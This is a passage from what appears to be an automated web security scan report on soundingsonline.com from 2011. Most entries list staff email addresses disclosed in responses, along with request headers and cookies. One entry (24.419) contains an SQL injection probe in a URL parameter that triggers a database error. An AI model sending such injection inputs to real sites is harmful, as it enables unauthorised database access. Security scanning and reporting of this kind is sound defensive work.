Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:32:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:32:58 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.407. http://www.soundingsonline.com/columns-blogs/under-way

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /columns-blogs/under-way

Issue detail

The following email addresses were disclosed in the response:
  • e.cirillo@soundingspub.com
  • info@soundingspub.com

Request

GET /columns-blogs/under-way HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:31:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:31:53 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.408. http://www.soundingsonline.com/component/chronocontact/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /component/chronocontact/

Issue detail

The following email addresses were disclosed in the response:
  • e.cirillo@soundingspub.com
  • info@soundingspub.com

Request

GET /component/chronocontact/ HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:52:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:52:27 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.409. http://www.soundingsonline.com/component/content/article/237622

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /component/content/article/237622

Issue detail

The following email addresses were disclosed in the response:
  • e.cirillo@soundingspub.com
  • info@soundingspub.com

Request

GET /component/content/article/237622 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:52:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:52:27 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.410. http://www.soundingsonline.com/contact-us

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /contact-us

Issue detail

The following email addresses were disclosed in the response:
  • advertising@soundingspub.com
  • circulation@soundingspub.com
  • e.cirillo@soundingspub.com
  • editorial@soundingspub.com
  • info@soundingspub.com
  • m.grzybowski@soundingspub.com
  • s.vasmatics@soundingspub.com
  • webmaster@soundingspub.com

Request

GET /contact-us HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:35:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:35:53 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:circulation@soundingspub.com">circulation@soundingspub.com</a>
...[SNIP]...
<a href="mailto:advertising@soundingspub.com">advertising@soundingspub.com</a>
...[SNIP]...
<a href="mailto:editorial@soundingspub.com">editorial@soundingspub.com</a>
...[SNIP]...
<a href="mailto:s.vasmatics@soundingspub.com">m.grzybowski@soundingspub.com</a>
...[SNIP]...
<a href="mailto:webmaster@soundingspub.com">webmaster@soundingspub.com</a>
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.411. http://www.soundingsonline.com/features

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features

Issue detail

The following email addresses were disclosed in the response:
  • e.cirillo@soundingspub.com
  • info@soundingspub.com

Request

GET /features HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:33:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:33:10 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.412. http://www.soundingsonline.com/features/destinations

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/destinations

Issue detail

The following email addresses were disclosed in the response:
  • e.cirillo@soundingspub.com
  • info@soundingspub.com

Request

GET /features/destinations HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:33:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:33:27 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.413. http://www.soundingsonline.com/features/in-depth

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/in-depth

Issue detail

The following email addresses were disclosed in the response:
  • e.cirillo@soundingspub.com
  • info@soundingspub.com

Request

GET /features/in-depth HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:33:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:33:50 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.414. http://www.soundingsonline.com/features/justyesterday

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/justyesterday

Issue detail

The following email addresses were disclosed in the response:
  • e.cirillo@soundingspub.com
  • info@soundingspub.com

Request

GET /features/justyesterday HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:34:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:34:29 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.415. http://www.soundingsonline.com/features/lifestyle

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/lifestyle

Issue detail

The following email addresses were disclosed in the response:
  • e.cirillo@soundingspub.com
  • info@soundingspub.com

Request

GET /features/lifestyle HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:34:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:34:13 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.416. http://www.soundingsonline.com/features/profiles

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/profiles

Issue detail

The following email addresses were disclosed in the response:
  • e.cirillo@soundingspub.com
  • info@soundingspub.com

Request

GET /features/profiles HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:34:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:34:05 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.417. http://www.soundingsonline.com/features/technical

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/technical

Issue detail

The following email addresses were disclosed in the response:
  • e.cirillo@soundingspub.com
  • info@soundingspub.com

Request

GET /features/technical HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:34:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:34:18 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.418. http://www.soundingsonline.com/features/type-of-boat

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/type-of-boat

Issue detail

The following email addresses were disclosed in the response:
  • e.cirillo@soundingspub.com
  • info@soundingspub.com

Request

GET /features/type-of-boat HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:34:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:34:03 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.419. http://www.soundingsonline.com/index.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /index.php

Issue detail

The following email addresses were disclosed in the response:
  • e.cirillo@soundingspub.com
  • info@soundingspub.com

Request

GET /index.php?option=com_content&view=category&layout=blog&id='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&Itemid=111 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=2si0fjj7r75bjp5ncust0p83f6

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:33:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:33:03 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the
...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.420. http://www.soundingsonline.com/more/digital-publications

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /more/digital-publications

Issue detail

The following email addresses were disclosed in the response:
  • e.cirillo@soundingspub.com
  • info@soundingspub.com

Request

GET /more/digital-publications HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:34:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:34:45 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.421. http://www.soundingsonline.com/more/the-masters-series

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /more/the-masters-series

Issue detail

The following email addresses were disclosed in the response:
  • c.brayfield@soundingspub.com
  • e.cirillo@soundingspub.com
  • info@soundingspub.com

Request

GET /more/the-masters-series HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:34:45 GMT
